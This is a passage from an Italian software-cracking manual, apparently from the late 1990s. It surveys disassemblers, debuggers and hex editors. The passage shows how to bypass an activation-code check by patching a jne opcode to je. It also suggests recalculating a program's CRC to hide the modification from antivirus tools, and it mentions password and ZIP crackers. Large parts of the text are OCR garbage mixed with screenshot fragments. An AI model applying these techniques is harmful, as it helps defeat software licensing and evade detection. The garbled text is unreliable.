creato ma sicuramente non ginge a qualle di IDA. 
Un altro disassemblatore è SOURCER anche se con questo, per ricreare programmi 
Windows, bisogna seguire più passaggi. 
Sourcer ha una buobna tradizione durata anni. 
Personalmente lo ricordo dal 1987. 
Dispone di una sola maschera in cui sono definiti i paramentri di analisi. 
Ritornando a SoftIce lo riterrei soltanto un debuggere non un disassemblatore. 


Motorola serles 


Viewer hex 


Dopo aver identificato le modifiche da apportare a livello di istruzioni 
assemblate queste dovranno essere codificate in esadecimale e dovranno essere 
scritte dentro al programma tramite un editor esadecimale. 

Facciamo un esempio pratico. 

Supponiamo di avere una chiamata ad una funzione che esegua la richiesta 
d’inserimento del codice d’attivazione e al ritorno dalla chiamata ci sia il 
controllo relativo alla correttezza. 

Il codice potrebbe essere 


E891D9F5D1 call 00404567 
38FD cmp esi, eax ; controlla la correttezza 


754E jne 00404445 ; se errato salta a .... 


Il codice potrebbe essere modificato 


invertendo le condizioni di salto ovvero Find ________________m__n_n_nm—_Cn_n_—_—«=_5___u1U 


va 
suna ” 
! 1 (ie 
Oinechon Case 
T+ Hex C Up 


(fax Cence! | 
so lenere 


je 00404445 Vale 


(© Dom 


Il codice operativo dovrebbe essere © ASCII 
cambiato da 75 a 74 per cui i valori 
esadecimali da inserire dovrebbero 
diventare 


744E je 00404445 


Mediante editor HEX potremmo HE 


ricercare la sequenza 754E mediante 
le apposite opzioni e successivamente Pe] [HE Dj Bfs L|F|[D|[s vj +[3] 


inserire il nuovo valore. 


La finestra di ricerca qui a fianco 5CO sia AICO A945 0033 C98B .,.F...U9...F.3.. 
corrisponde a quella di HEX WORKSHOP i 1424 1489 4024 ,,,D.,1$,,D$.,L$ 
: a i » i 48 5424 ?20B9 442: 1 è sa 
ma comunque in qualsiasi editor HEX i 5024 2089 4024 a ul 
È . . = pà . P 1 OO E, 0 LEI SUD fici di]gala Sv LIU 
esiste la possibilità di ricercare } 1051 FF15 CCA9 4500 6685 C075 4,L5.0...,E. 


sequenze di valori esadecimali. 

Prima di eseguire le modifiche sul 
file prendetevi cura dei crearvi una 
copia di backup del file originale in modo da poterlo sostituire nuovamente nel 
caso in cui non funzioni più. 


Analizzatori del file di registro 


Molti dati legati alle licenze dei software ecc. sono memorizzati dentro al file 
di registro. 

Per l’analisi di questi esistono diversi programmi più o meno completi. 

Alcuni eseguono solo letture e scritture nel file altri invece sono in grado di 
tenerli sotto osservazione per vedere le modifiche che vengono apportate da 
certi programmi. 

Nelle Norton Utilities se ne trova uno ed in ogni modo tra lo shareware ce ne 
sono moltissimi tra cui uno specializzato per i CRACKATORI Win-eXpose-Registry. 
Alcuni programmi controllano tutte le modifiche che vengono apportate al sistema 
comprese scritture e cancellazioni dai file WIN.INI e SYSTEM.INI e aggiunta di 
programmi al file system del sistema. 


File vari 


Esistono diversi files che diventano utili in alcune circostanze. 

Alcuni crackano i files .ZIP, altri cercano password sotto NT o Unix. 

Un file essenziale in molti casi è ICOMP il quale è reperibile anche nella 
versione fornita con il Borland C di Install Shield. 

Si tratta del compressore. 

Alcuni programmi come ad esempio librerie, activex ecc. vengono forniti 
compressi mediante questo compressore. 

Per poter debuggare il codice è necessario decomprimere i files di libreria. 
Quando viene installato un file mediante InstallShield nella directory 
temporanea del vostro sistema troverete i seguenti files: 


_SETUP.LIB 
SETUP.EXE 
_SETUP.DLL 
SETUP . PKG 
SETUP.INS 


_SETUP.LIB è un database compresso da InstallShield il quale può contenere files 
eseguibili e dll di supporto all’installazione. 

Alcune volte questi files di 

supporto sono nella stessa 

directory di SETUP.EXE ma ‘î Microsoft Spy++ - Messagex (Window DO0ONA?7C) 

altre volte sono compresse Spy Ire Search View Messages Window Hep 
dentro a questo file. - 2a 
Un file spesso utile è lo nIslo) “il aalx srl 
Spyt+ fornito con i linguaggi Gi Messages [Window 000D0A7C) 
Microsoft o l’utility similare PA regate lalla 
fornita dalla Borland. | 00000ACA4 S BM_SETSTATE fState:False 
Spyt+ è in grado di spiare 


00000AC4 R BM_SETSTATE 
tutti i messaggi indirizzati 00000130 S.BM_SETSTATE fState:True 


Ge is nostre nente In [torio S SM -SETEIE sei 
Windows con la possibilità di 00000130 R.BM_SETSTATE È 
selezionare quali ed n 00000130 S.BM_SETSTATE fState:True 
particolare modo ha la 00000130 R.BM_SETSTATE 


possibilità di filtrare i tipi 
di messaggi. 

Alcune volte è facile dedurre Pata pesEi sd 
con quali funzioni vengono 

eseguite le letture dei codici 

di serializzazione mentre altre volte tali funzioni non vengono svolte nei modi 
classici, con GetDlgItemText o similia, e quindi diventa più complesso 
identificare il punto giusto dove mettere breakpoint. 

SoftIce possiede un metodo per gestire in backtrace ma comunque l’individuazione 
del punto giusto facilita compiti. 

Mediante una funzione particolare di Spy++ è possibile selezionare quale 
finestra mettere sotto osservazione. 

In una finestra di Spy++ esiste un cursore che può essere agganciato con il 
mouse e trasportato sulla finestra 


00000130 S,BM_SETSTATE fState:True RA | 
» 


interessata. 
Di questa finestra verrà 
selezionato l’handle. [Message Option: _—_rr______ 
Successivamente possono essere MWirglos | Messages | Qupè | 
scelti i messaggi che si vogliono nda Fil Tod — Selected Obje& 
intercettare selezionandoli dalla bath le Tal 
lista dei messaggi veri e propri window to select, Ihen 
oppure scegliendo la classe degli ERRE RA ANO 
oggetti Windows legati alla brc Gerini 
tipologia dei messaggi (pulsanti, irira 
edit field ecc.) T Hide Sppts 
Tante utilities reperibili su Additional Windows 
Internet (o) nei dischi dei I Part tdi di Sen Tier I dlwindewe in System 
compilatori e 0S possono diventare pa inden LEI Re 
utili in certe circostanze. 
e 5 TT Save Settings as Defaul 
Programmi come, ad esempio, 


DUMPBIN.EXE, EDITBIN.EXE ecc. 
erano presenti in alcune versioni 
vecchie del compilatore Microsoft. 
Anche il vecchio DEBUG.COM del DOS 
alcune volte può essere utile. 
Ricordatevi sempre che spesso, ad esempio nella grafica, un solo programma può 
fare le cose ma due o tre le possono semplificare. 

Pensate quando ad esempio usate un programma per fare scritte a 3 dimensioni. 
Un'altro programma lo usate per fare lo sfondo ed un terzo ancora per fondere le 
due immagini di prima e per crearci degli effetti. 

In questo campo il discorso è lo stesso. 


Spesso potreste trovarvi nelle 
“canne” debuggando con SoftIce e 
quindi potreste prendere DASM per 
analizzare qualche blocco 
particolare e dopo avere 
identificato la posizione usare 
nuovamente SoftIce per proseguire. 
Altre volte l’uso di diversi 
programmi è obbligatorio in quanto 
uno viene usato per decryptare il 
sistema di protezione a tempo. 

Un altro per analizzare il 
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Usare sempre gli stessi programmi 
semplifica la vita anche perchè 
alcuni pretendono molto tempo per 

poterli usare con dimestichezza e [rssoensa perse || av 

quindi visti gli sforzi fatti 

conviene poi farli fruttare. 

Spesso si cambiano le cose non perchè non soddisfano più ma solo perchè è di 
moda aver sempre l’ultima versione. 

In questo campo converrebbe vedere i risultati. 

Se con un debugger si riesce sempre ad avere sottomano le funzioni necessarie 
non conviene cambiare spesso anche perchè in quel modo alla fine si 
conoscerebbero tanti programmi ma nessuno bene. 

SoftIce possiede, ad esempio, una così ampia possibilità di breakpoint che la 
difficoltà è quella di arrivare a comprendere bene quando conviene usarne un 
tipo e quando invece conviene usarne un altro tipo. 

Alcune volte bisogna ricercare nei prodotti utilizzati per la creazione dei 
programmi o dei settaggi le utility. 

Prima dicevo di ICOMP O ovvero dell'utility di compressione usato da 
InstallShield. 

Per poter eseguire il cracking è necessario prima scompattare i moduli creati 
dal gestore delle installazioni e poi eseguire il setup tramite debugger. 

Un programma particolare è SMARTCHECK sempre della NuMega che anche se è 
abbastanza criticato, alcune volte permette di raggiungere degli obbiettivi 
senza impazzire con altri strumenti più complessi. 


I Save Settings as Defauli un Hotkey T UpDoagm Î TabCniil 


SmartCheck è un debugger di run-time che permette di affrontare le condizioni 
più critiche incontrate con Visual Basic. 


e Errori fatali di run-time che sono complessi da risolvere 
e Problemi che nascono da seuqenze di azioni 

e Uso no corretto di funzioni API 

e Cattivi valori passati come argomenti alle funzioni 

e Gestione di valori complessi 

e Errori delle componenti come ActiveX ecc. 


Per quanto ci riguarda è interessante vedere come Smart Check funziona. 

Come viene eseuito un .EXE SC continua a funzionare in background monitorandolo 
in continuazione e catturando tutti gli eventi. 

Durante l’esecuzione è ossibile abilitare o disabilitare il report degli eventi. 
SM cerca automaticamente gli errori nel programma e nelle DLL associate. 

Questo funziona anche su programmi senza sorgenti (cosa per noi fondamentale). 
Comunque la cosa migliore stà nel fatto che SM controlla tutte le chiamate alle 
API, tutti i messaggi e tutti gli altri eventi del programmna. 


In questo volume vedrò di trattare tutto quello che e’ necessario sapere. 

Una parte è dedicata alla teoria destinata a spiegare la filosofia di certi 
linguaggi, di certi tipi di protezioni e di certi sistemi di sviluppo. 

La parte pratica utilizzerà sistemi facilmente reperibili su Internet. 


Vi riporterò informazioni in due riprese e dove procurarveli. 

Nella prima fase faremo una panoramica di tutti i tipi di programmi mentre nella 
seconda vedremo la sintassi e degli esempi d’uso. 

Riporterò anche delle mappe con su i gruppi di software che potrebbero essere 
adottati in un caso o nell'altro. 

Il manuale tratterà anche esempi portati in diversi linguaggi anche se 
sicuramente il C è quello più trattato. 

Come ripeterò successivamente verrà riportata la sintassi Assembler anche se di 
fatto non è un manuale di programmazione. 

Le conoscenze che si devono avere legate a questo linguaggio sono quelle 
necessarie per poter seguire il flusso mediante un debugger. 

La sintassi dell’Assembler riporta termini che il compilatore e il linker 
eliminano e quindi analizzando il file eseguibile non sono più visibili. 

Per fare un esempio nella programmazione in Assembler esiste la teoria della 
definizione dei gruppi di segmenti ecc. 

Questa teoria fa si che il sorgente debba essere compilato (scritto) in un certo 
modo. 


include listing.inc 

if @Version gt 510 

.model FLAT 

else 

_TEXT SEGMENT PARA USE32 PUBLIC 'CODE' 
_ TEXT ENDS 

_DATA SEGMENT DWORD USE32 PUBLIC 'DATA' 
_DATA ENDS 


Il compilatore e il linker tradurrà tante informazioni e termini del linguaggio 
in indirizzi fisici e questo in particolare modo visti con il debugger in fase 
di esecuzione. 

Se io in un sorgente Assembler scrivo 


label: 
mov ax.1 
jmp label 


eseguo un riferimento simbolico che il compilatore traduce in un riferimento 
rilocabile. 

Utilizzando tabelle di rilocazione e fattori fisici legati alla memoria ed al 
sistema operativo, il programma quando viene letto in memoria non possiede più 
quei riferimenti in quel modo ma utilizzerà riferimenti ad indirizzi reali od in 


modo diretto usando 
l’indirizzamento a 32 bits o 
utilizzando il metodo della 
segmentazione. 

In pratica, invece del codice 
precedente, troveremo 


e fully qua 


0040:4555 ... o I DriRe default anieiat 
0040:6900 mov ax, 1 Variablo 
0040:6910 jmp 0040:4555 


kimports) 
Cpackfields) 


Alcuni debugger e disassemblatori 
tentano di rigenerare i sorgenti 
in modo più simile all'originale 


possibile ma non possono fare i 
miracoli. 

Quando i programmi sono scritti in Java allora la conoscenza del linguaggio è 
essenziale in quanto il flusso dovrà essere seguito in Java. 

Prima di iniziare a vedere le varie teorie diamo un occhiata agli strumenti che 
bisognerebbe avere per poter eseguire certe operazioni. 

Tenete presente che nei casi in cui vengono riportate tabelle con le funzioni 
dei programmi trattati sono quasi sempre files trovati su Internet non soggetti 


a Copyright, e quindi riportabili, e che ho mantenuto nella lingua originale per 
evitare di riportare interpretazioni personali. 

Infatti generalmente vengono garantiti i permessi di pubblicazione di certi 
documenti nella loro forma originale senza che questi possano essere alterati o 
manomessi in qualsiasi modo. 


DISASSEMBLATORI 


IDA 3.85 

DataRescue sa/nv PHONE: 32-4-3446510 

45 quai de la Derivation FAX: 32-4-3446514 
4020 Liege 

Belgium 

VAT : BE-448.270.553 


Qui ci troviamo dinanzi al re dei disassemblatori. 

Solo per fare capire la differenza utilizzando il vile byte come confronto 
possiamo dire che WDASM è un file di 600Kbytes compattato mentre in questo caso 
il demo della versione 3.85 è un file compattato di 16 Mbytes. 

La differenza c’è e si vede anche per le funzioni e per l’accuratezza della 
traduzione del codice. 

In WDASM le funzioni del programma devono essere individuate dalla persona 
mediante i riferimenti delle varie call. 

Qui la ricostruzione è completa. 

Le opzioni per l’analisi e la ricostruzione del programma sorgente sono 
innumerevoli. 


L'interfaccia è DOS windovizzata anche se sinceramente la preferisco a quella 


Mé IDA - muedit.exe _{O{x| 


PORTI 


Do 


[Li 


align 10h 


MDOMOOO 


D 


proc 


Lu 


MDOMOMOMOMOO 


D 


LULU 


Ri 
.t 
Ri: 
.t 
n 
È 
nÈ 
at 
È 
È 
È 
Ri: 
.te 
at 
nt 
LE 
.t 
a È 
at 
È 
Si - 
«È 
Ri: 
Ù 


m 


cmp 
push al 
t:0041A4AA mov esp+1Ch+ 
A4AL: sub_0_41A490+11 


interamente Windows. 

Alla data attuale (10-99) la versione è la 3.85 anche se è disponibile su 
Internet, a parte la versione crackata, anche una versione FREEWARE. 

Inoltre esiste la possibilità di eseguire le analisi in base a diversi 
processori selezionabili da una lunga lista. 


IDA riesce a ricostruire anche le strutture cosa che viene considerata solo come 
astrazione nei linguaggi a più alto livello. 
Il programma può mostrare infinite informazioni in finestre separate. 


Fale Edit Navigate View Options. Windows 


Functions window _—_—________4 
Function name Segment Start Length RFLSEMICOY 
oe — _—._r_==""%51M:[/7- 


Ex1tProc 
_MmsEH 


_msEH:0000 


Names window 
Address Pub 
DDERequestTimeout O040BA7O P 


Ricordatevi prima di prelevare il 16 mbytes del programma dal sito di IDA che il 
file dispone delle seguenti limitazioni. 


Limitations 


- you will not be able to load old databases 

- you will not be able to produce .lst or .asm files 

- you will not be able to disassemble files larger than 64kbytes. 
- this version will expire September 1st, 1998 


The full versions comes with 


- unlimited database support 
- unlimited output support 

- file size limit of 64MB 

- no expiration date 


JAD (per linguaggio JAVA) 

Jad - the fast Java Decompiler. 

Jad home page: http://web.unicom.com.cy/-kpd/jad.html 
Copyright 1997-98 Pavel Kouznetsov. 


Si tratta di un programma che si attiva da Dos e che necessita di argomenti 
sulla linea di comando. 

La sintassi è quella mostrata nell'immagine: 

Se disponete delle monografie di IoProgrammo relative a Java lo troverete 
dentro. 

Fornendogli in input un file .class avrete in output un file .java. 


W32/16DASM89 
W32DASM Ver 8.xx Series is designed for Windows 95 and Windows NT 4.0. 


http://www.epage.com/page/w32dasm 
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10010: 
cozecnhti cata sta; DICIPONE Sffret. COOVIICO Tian 
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alle API There Ace Mo Iualog Fercurce» in Phi Applicazioa 
importate eo e tte rea er 
quindi in 
grado di 
mostrare dove 


avvengono tali 
chiamate ecc. 


Nel caso di na Done - Meme cc E Rea Pi 


inserimento di Patio Nfcommmst Di tueatie Je f TE 
codici pe 


{riante Local Puncrisa Secatte 
attivazione è 


di : Tseep duro On API 
Mares Dato "oep* Inatoaction Dupass 


Fo CAiceeo 


una funzione = 
1 . . È Formia: 
importantissim TESA 
in uanto fo pi: svicas sa: — 
Ra q di Miu | Rec | piccini cache apr iratrtà [MUanA WII [tatp || det “RESI 0 
non impazzire 
cercando i riferimenti tramite gli indirizzi. 
Il programma apre diverse finestre in cui vengono mostrate moltissime 
kb] Hweorks32 - Hex Workshop informazioni 
3 e ; legate alla 
#|8|S| ||6|2) 2|£] ce) [H bj 8[s 1|F[D][s vj #[S] registri. 
L'esecuzione è 
10000000 FDs 0300 0400 0000 FFFF possibile con 
00000010 BS00 0000 4000 0000 molte modalità 
00000020 0000 0000 0000 0000 come ad esempio 
710000030 0000 0000 n000 n000 s000 
00000040 DEIF 00B4 D9CD 21B8 O14C CD21 quella passo a 
D0000050 6973 726F ? G16D 616E 6E6F is MG canno passo con by-pass 
00000060 7420 6265 2072 2069 494F 5320 t be run in DOS delle funzioni 
00000070 6DEF 2EOD . 24D0 0000 0000 mode.... 1 
00000080 5045 4C01 AD9? 0000 0000 PE..L a Hus 
00000090 0000 EDOO OBDI onec manuale, quella 
00000080 0068 0030 2000 0010 0000 passo a passo in 
000000B0O O08a 0000 4000 ODO10 0002 0000 automatico ecc. 
000000C0 0100 0000 0000 0400 0000 0000 ‘bh 1: 
000000D0O 0050 0004 0000 0000 0200 0000 sono possibili 
000000E0 4002 0010 0000 oo010 0010 diversi 
000000F0 0000 1000 0000 0ODO 3500 breakpoint 
00000100 00480 FC23 0000 OD0EO 10F8 compresi quelli 
00000110 0000 SENT 0000 0000 0000 0000 i 
00000120 Q0EO 6 3852 0000 0000 0000 0000 che ESTLZAHO 
00000130 0000 DONO 0000 2000 0000 D000 0000 quando il viene 
00000140 0000 0000 0000 0000 richiamata 
00000150 0000 0000 0000 0000 0000 0000 qualche DLL o 
00000160 0000 0000 0000 0000 o 0000 
00000170 0000 0000 0000 2E74 6579 7400 quando VENGONO 
00000180 AIGÀ 0010 006C 0400 0004 create delle 
00000190 0000 DO 0000 0000 0000 2000 ve threads. 
00000140 2E62 7373 0000 4C02E 0000 0080 0 Ù he I sorgenti 
000001B0 0000 DO 0000 0000 0000 0000 00 . : 
COCONICO 0000 0000 8000 DOCO 2E72 6461 7461 ricavati SOno 
nannnsnno rann ina _nnnn_n i ann nnzn = veramente molto 
Ready Cifse* 00000000 — Nahie WIBETS2II — [449512 ties dettagliati. 


Come dicevo prima 
dove è possibile 
WDASM ricrea le informazioni simboliche. 


MSVBVM60.__vbaAryDestruct 


MSVBVM60.__vbaAryLock 
MSVBVM60.__vbaAryUnlock 
MSVBVM60.__vbaBoolVarNull 
MSVBVM60.__vbaCastObj 
MSVBVM60.__vbaCastObjVar 


Ad esempio quelle precedenti sono alcune chiamate al modulo del Visual Basic 
fatte dal programma disassemblato. 


HEX WORKSHOP 
Hex Workshop, the Professional Hex Editor v2.0 
32 bit version - HWORKS32.ZIP 


CompuServe: 75554, 377 

America Online: BreakPoint 

Microsoft Network: BreakPoint_Software 
Internet: 75554.377@compuserve.com 


Quando si arriva ad identificare le procedure dove vengono eseguite le 
protezioni bisogna scrivere il codice per by-passarle. 

Il codice può essere bideato in assembler anche se poi deve essere tradotto in 
exadecimale per essere scritto dentro al modulo eseguibile dove è residente la 
protezione vera e propria. 

Nel capitolo relativo all’assembler ho riportato le tabelle con i codici 
operativi in esadecimale proprio per questo motivo. 

Generalmente le cose possono essere semplici in quanto spesso si tratta di 
cambiare dei SALTA_SE_UGUALE in SALTA_SE_DIVERSO e quindi il codice originario 
necessita di pochissime modifiche che comunque devono essere inserite tramite 
editor hex. 

Hexworkshop è solo uno ma ne esistono altri che tra poco vi mostrerò. 


HACKMAN 

Hackman v3.0 

http://members.tripod.com/-techmasters 
mailto:techmasters@geocities.com 


Hackman è un ottimo editor hex in quanto 


deo 


== dispone di moltissime funzioni tra cui un 
ae no x visualizzatore in assembler. 
a yte ptr [ebx]. > E di A 
0000 ada byte ptr [eax; Questa funzione è spesso utile quando si 
000400 ada byte tr . . . . . 
0000 ada iran cercano parti speciali di codice per essere 
DET A o sicuri del posizionamento. Quando si cercano 
Tio: 2 W le istruzioni in cui vengono eseguite le 
fu > == protezioni bisogna memorizzarsi da qualche 
TOOODO sua rg Sei parte le sequenze di codici esadecimali 


relative alle istruzioni stesse. 
Queste informazioni dovranno essere 
fornite come argomenti per le ricerche 


OETRESCKT SORESINA TIA dentro al file eseguibile in modo tale 
si 


cectucci 


alla lla lol bll doblo bd ile oblio toalaimbl di 141104140 4 da poter inserire le modifiche porprio 

Mrecececcenceeeseeeaceaneseniacsasse . in quel punto. 
Spesso le seuquenze di valori hex si 
ripetono dentro ad un programma ed è 
facile perderci gli occhi in mezzo a 
pagine piene di 0x4D OxFF ecc. 

cri Dare un occhiata di conferma al codice 
assemblativo non dispiace. 

di HackMan dispone inoltre di molte 
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Garner quit | inandar Susa Choct Converztore | Satocion | Mamo l Fux | 
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dale ima = SRI: . 
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Spesso si ha a che fare con file con differente byte order. 

Esiste infatti una differenza tra il formato Intel e quello Motorola. 
HackMan permette di settare anche il byte order. 

Tra le altre cose è inserito un calcolatore hex. 


HIEW 


Molti hacker consigliano HIEW. 

Devo ammettere che HIEW dispone di molte ottime funzioni anche se non è un 
programma Windows. 

Una funzione buona che 
Dentro ad un file 
.EXE esiste un CRC RAZZE SSABAIE” 


che permette. a le |El ejE Al 


certi programmi di 


quella di mostrare l’header di un file EXE editato. 


;£; ; BRRRBAGA: 4D SA F7 Bi-52 BA DI BB-DB 
verificare SE il BBABBBIA: 2 Da BO- dA BA GB BA-52 
programma originale 20B99928: dC 49 ! 
: BAaRIa: a 2 
ha subito delle BRBBBAAB: 6C 6C Signaturo O 
; £; iaci BRBBBASO: 65 6 i ytes on last 29) Da 
MOALELChE, ,dlaciamo BOGOROLE= il Fri LU «Cat lPa 
non autorizzate”, te È > pr ARR £ 3 
. d Da: do € apagh si ader 
Sono inoltre 20B9G0?8: 2 28 Mininun memory 
1 BABBBNB: i B |a. Um memory 
FIBOFLATE dentro BEDAGORA: 20 < SS:6P 
all’header molte DISSSSCA: ma 
altre informazioni DBBBABEO: E? Rolocation tablo adroco 9952 
BABE Bi na Vermiav nu » Hi bi 
legate — alla ft 33 ZEntew point CEIECEE 
rilocazione del BIBABLIO: 95 >FileLength BBABBNIF7 
CEEEEMEGE 3 AD N 
programma, al BRGROIIO:= B2 
; ; BEBGBILAB: f ED dh 
numero di pagine BERGALSO: D3 DI-ED dA 7. Bò FB-B2 73 28 DI 


ecc. 90008169: ED dA 74 B2-D1 DI 85 DB-7% Di ED-40 74 AD DI 
La cosa ottimale — - - — - : 

sarebbe quella di 

eseguire la 

modifica al codice del file .EXE e quindi di ricalcolare il CRC in modo da non 
mostrare anomalie ai programmi tipo gli antivirus. 

Esistono alcune utility che permettono di fare questo lavoro e tra poco ne 
parleremo. 

L'unica seccatura stà nel fatto che il programma deve essere necessariamente 
lanciato con il nome del file da editare come argomento. 

Anche HIEW permette di mostrare il codice in assembler. 


[IE] HIEW possiede anche l’opzione per 
mostrare il codice come se fosse 
a 16 bits oppure a 32 bits. 

Anche se molti editor HEX 
dispongono della possibilità di 
mostrare il codice assembler 
questi non possono comunque 
sostituire i disassemblatori ed i 
debugger i quali a differenza dei 
normali editor possiedono la 
possibilità di eseguire passo a 
passo i programmi senza contare 
che è anche possibile 
visualizzare tabelle relative al 
programma stesso come ad esempio funzioni esportate ecc. 


WINDEBUGGER 


Dentro a prodotti come Visual C++ viene fornito il debugger di Visual Studio. 
Microsoft una volta ogni tanto distribuisce dei blocchi di programmi e file 
contenenti informazioni ed utilities per l’ambiente Windows. 

WINDEBUGGER è presente nel pacchetto rilasciato nel settembre 1999. 

In pratica ha gli stessi comandi del debugger di Visual Studio tanto da poter 
essere considerato lo stesso ma esterno a questo. 

Sicuramente la potenza di un debugger è anche in funzione alla gamma di 
breakpoint che può gestire. 

Il sistema di breakpoint di WinDebugger possiede un interprete metacircolare. 
Questo significa che è possibile eseguire dei comandi quando si attiva un 
breakpoint. 

Il sistema di breakpoint di WDBG permette di usare qualsiasi istruzione di 
valutazione del C come costrutto condizionale per il breakpoint stesso. 

Ad esempio per bloccare il programma ogni volta che il contenuto di una 
variabile è cambiato è possibile usare il costrutto dentro alla finestra di 
settaggio dell’espressione 


&<nomevariabile> 


Questa tecnica non funziona con le variabili automatiche in quanto l’indirizzo 
può cambiare essendo in funzione dello stack il quale cambia ogni volta che si 
entra in una funzione. 

Questo è il caso in cui il breakpoint dovrebbe cambiare dinamicamente. 

Per questo scopo il breakpoint deve essere abilitato ogni volta che la funzione 
parte e disabilitato in uscita. 

Supponiamo che la nostra funzione si chiami subroutine e che la variabile locale 
automatica sia i. 

Fate partire il programma ed eseguite lo step per entrare nella funzione che 
definisce la variabile i con 


g subroutine 
p 
bp500 ={subroutine}&i /r4 /C"?i" 


Il numero del breakpoint deve essere scelto sufficientemente grosso da essere 
distante dai numeri degli altri breakpoints. 

Notate che /r4 dice che la variabile è lunga 4 bytes ovvero le dimensioni di un 
int. 

Dopo aver fatto questo disabilitate il breakpoint con 


bd500 
Il secondo breakpoint viene creato sull’entry point della funzione. 
bp .<FirstLine> /C"be 500;g" 


La prima linea della funzione, l’entry-point, è il punto in cui deve essere 
abilitato il nostro breakpoint. 
L'ultimo breakpoint deve essere creato sull’ultima linea della funzione. 


bp .<LastLine> /C"bd 500;g" 


Come avrete notato i due ultimi breakpoint abilitano il primo in ingresso ed in 
uscita. 

É da notare che se la funzione dispone di più punti di uscita allora si dovranno 
creare più breakpoints come l’ultimo. 

Spesso nella gestione dei watch le variabili controllate vanno fuori scope per 
cui al posto del valore viene mostrato il messaggio 


CXX0017 Error: symbol not found 


Un esempio potrebbe essere quando si crea una common dialog e si esegue il break 
del programma nell’istante in cui si è dentro a COMDLG32.DLL cercando oi di 
visualizzare una variabile dentro al programma con ?gvar 

Per vedere la variabile dentro al programma è sufficente dare 


?{, ,myapp}gVar 

WDBG gestisce una linea di comando allo start del debugger stesso. 

Questo sistema può essere anche utilizzato per debuggare un programma 
ridirigendo STDIN in modo tale che prenda l’input da tastiera. 


windbg cmd /c "app < input.txt" 


WDBG e’ sicuramente un debugger molto più adatto all’uso con i sorgenti in 


quanto molte 
informazioni non 
le mostra. 
5 Window Debugger BEE » + 
cn E 
2|2j Ali le] Bei) d| £| FRE] come SoftIce 


devono ricostruire 
le informazioni. 


Nei codici 
e assemblativi 
6 BAG compaiono le 
Dr Si informazioni 
Fn sima simboliche solo 
56 push esi è 
BFF76BAC 57 pus pdi perchè queste 
BFF76BAD 68C094FCHF push OBFEC94C0h vengono 
BFF76882 EBD1DIFFFF call BEF741B8 
BFF76887 BB3DBAADFCBF hoy edi,dword ptr ds:[0BFFCA0B4h] rigenerate. 
BFF768BD DBFF Dr edi,edi In pratica il 
BFF768BF 7430 Je BEF769ED 


debugger legge le 
funzioni importate 
e gli indirizzi 
dove sono state 


Hodule Load: C:NUTILITY-HWORExHEWORKS32.EXE (synbol loading deferred) 
Thread Create: Process=0. Thread=0 
SWINDONSYSYSTENWINSPODL DRY {synbol losdang deterred) 


Hodule Load: C:xWINDOWS-SYSTEM\SHELL32.DLL (synbol loading deferred)] osizionate 

Module Loa C:NWINDOWSYSYSTENN\CONCTL32.DLL (svnbol loading deferred) p È ; 

Module Losd: C:-WINDOWS-SYSTENNSHLWAPI DLL (synbol losding deferred) Successivamente va 
Module Losd SWINDOWS-SYSTEN-CONDLG32 DIL {synbol losdang deferred) 1 jl 
Hodule Load: C:N\WINDOWS\SYSTENNADVAPI32.DLL (syubol loading dsferred) a eggere 1 


Module Load: 
Module Load: 
Module Load 


:NFINDOWSYSYSTEN\GDI32.DLL (svnbol loading deferrsd) 
C:ASWINDOWS*-SYSTEN-USER32 DLL (svnbol loading deferred) 
SWINDOWNS-SYSTEN-KERNEL32 DIL ({synbol losdaing deferred) 


codice sostituendo 
gli indirizzi di 
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Ln 1, Coll Proc 000 000 Thrd 000.000 [as M OR [C4PS [NU funzioni relative . 

Chiaramente 

possedendo i 


sorgenti questa ricostruzione non è necessaria visto che sicuramente la fase di 
debug verrà eseguita seguendo il tracciato nel sorgente. 

Il debugger fornisce alcune informazioni come ad esempio quelle dei moduli leti 
con il programma (DLL, VBX ecc.) 

Dispone di finestre di watch, visualizza i registri, permette di inserire 
breakpoit e possiede un vsiaulizzatore che mostra le chiamate nello stack. 
Sicuramente non è il massimo per certi compiti. 

I comandi relativi allo step by step sono disponibili mediante pulsanti che 
permettono di entrare o passare sopra alle funzioni presenti. 

La seguente lista mostra i comandi che possono essere dati in WINDEBUGGER n4ella 
finestra COMMAND. 


È Comment 


; Command Separator 


Syntax 
Examples 
Step twice, printing the variable szVar after each step. 


P;?szVar;P;?szVar 


Execute to source line 123, print the value of counter, then continue execution. 


g@123;?counter;g 


? Evaluate Expression 


Evaluates and displays the value of the expression or symbol in the context of 
the current thread and process. 


Syntax 

? expression [, format] 

Parameters 

expression 

Expression to be evaluated with the expression evaluator. 

The C++ expression evaluator cannot calculate expressions that use the 
conditional operator (?:). 

format 

C-style format characters. For example, to display an int, use ",i" as the 
format specifier. Do not use percent signs (%). For more information, see the 
table below. 


Remarks 


The following table describes the C-style format characters. 


Format Definition Example 

D, d, I, I Signed decimal integer. > ?0x100,i 256 

u Unsigned decimal integer. > ?-1,U 4294967295 

lo) Octal integer. > ?240000,0 0000001000000 
XxX, X Hexadecimal integer. > ?40000, x 0x00040000 

f Signed value in floating point format 


with six decimal places (takes 

implicit/explicit type FLOAT as an argument). 

> ?(float)(3./2.),f 1.500000 
e, E Signed value in scientific notation with 

up to six decimal places (trailing zeros and 

decimal point are truncated). 

> ?(float)(3./2.),e 1.500000e+000 
g, G Signed value in floating point decimal 

format or scientific format, whichever is more 

compact. > ?(float)(3./2.),g 1.5 
lo; Single character. > ?41,c 'A' 


S Characters up to the first null 


character. 

> ?szHello,s Hello (szHello="Hello") 
l Long-Word modifier. > ?23./2.,1f 1.500000 
L Long-Long Word modifier > ?@0xffffffff,Li -1 
h Half -Word modifier: > ?0x12345, hi 9029 


Note The '1", "L", and "h" modifiers work differently with different base 
types. 

If, for instance, you are coercing an expression to type long double (80 bit), 
the "L" modifier will work correctly on that expression. The "L" modifier also 
works correctly on long long integer expressions, as shown in the table above. 
Windows Debugger implicitly cast values when evaluating an expression. It 
operates on the actual bit quantity unless coerced through casting, as shown 
above. 


! User Extension DLL 


Calls a DLL function from the debugger. Use this command to call special 
routines while debugging. 


Syntax 

! [filename.]function [string] 
Parameters 

filename 


Name of the DLL to call (without the .DLL extension), followed by a period (.). 
The default filename is NTSDEXTS.DLL. 


In kernel debugging, the default extension DLL depends upon the target platform: 
Target Platform Default Extension DLL 

x86  KDEXTX86.DLL 

ALPHA KDEXTALP.DLL 

function 

Name of the DLL function to call. 

string 

String to pass to the DLL function. 

Remarks 

For a complete list of the built-in extension commands, enter !? at the Windows 


Debugger prompt. For information on creating and using kernel debugger 
extensions, see the Windows NT DDK. 


| Display Process State 


_ Display Thread State 


# Search for Disassembly Pattern 


% Change Context 


Changes the context to the specified frame. Updates the Locals window with the 
